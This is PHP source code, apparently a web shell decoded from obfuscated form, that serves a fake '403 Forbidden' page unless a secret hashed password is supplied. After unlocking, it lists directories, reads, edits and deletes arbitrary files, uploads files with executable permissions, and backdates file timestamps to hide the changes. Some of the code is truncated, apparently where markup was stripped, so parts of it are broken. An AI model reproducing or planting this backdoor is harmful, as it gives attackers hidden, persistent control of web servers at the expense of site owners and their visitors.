/* Decoded by unphp.net */ function head() {@session_start();$data = array_merge($_GET, $_POST);if(!empty($_SESSION['id']) || substr(md5(md5(@$data['id'])),0,28)=='b398ae271589319373c948d8cde8') {$_SESSION['id'] = 1;foot();} else {exit('403 Forbidden.

Forbidden

You don\'t have permission to access / on this server.

');}} head();function foot() {$Path = dirname(__FILE__);$time = time()-8888888;$vifiletime = date('Y-m-d H:i:s',$time);$data = $_GET;$msg = '';$lsdir = isset($data['id']) ? _urlde($data['id']) : $Path;$vifile = isset($data['vid']) ? _urlde($data['vid']) : '';$rm = isset($data['rm']) ? _urlde($data['rm']) : '';if (!empty($vifile)) {if (isset($_POST['txt'])) {file_put_contents($vifile,$_POST['txt']);if (isset($_POST['time'])) touch($vifile,strtotime($_POST['time']));$msg = 'ok';}$vifiletxt = '';if(is_file($vifile)) {$vifiletxt = file_get_contents($vifile);$vifiletime = date('Y-m-d H:i:s',filemtime($vifile));}$lsdir = dirname($vifile);} elseif (!empty($_FILES["upf"])) {$upf = $_FILES["upf"]; if(move_uploaded_file($upf['tmp_name'], $lsdir.'/'.$upf['name'])) {chmod($lsdir.'/'.$upf['name'],0755);touch($lsdir.'/'.$upf['name'],$time);$msg = 'upfOK';}} elseif (!empty($_FILES["uf"])) {$up_files = $_FILES["uf"]; $up_ok = 0;for($I=0;$I'.date('Y-m-d H:i:s',filemtime($v)).''.filesize($v).''.substr(sprintf("%o",fileperms($v)),-4).'open';}foreach(glob($lsdir.'/{*,.*,*.}', GLOB_BRACE) as $v) {if(is_file($v)) $output .= '
'.preg_replace('/.*\//','',$v).''.date('Y-m-d H:i:s',filemtime($v)).''.filesize($v).''.substr(sprintf("%o",fileperms($v)),-4).'edit = del
';}echo 'Admin
PATH WWW'.$msg.'
'.(isset($vifiletxt)?'

':'
'.$output.'
').'';exit;}function _url($s) {$s = urlencode(base64_encode($s));return $s;}function _urlde($s) {if(preg_match('/^\//',$s) || preg_match('/(:|\.)/',$s)) return $s;$s = base64_decode(urldecode($s));return $s;}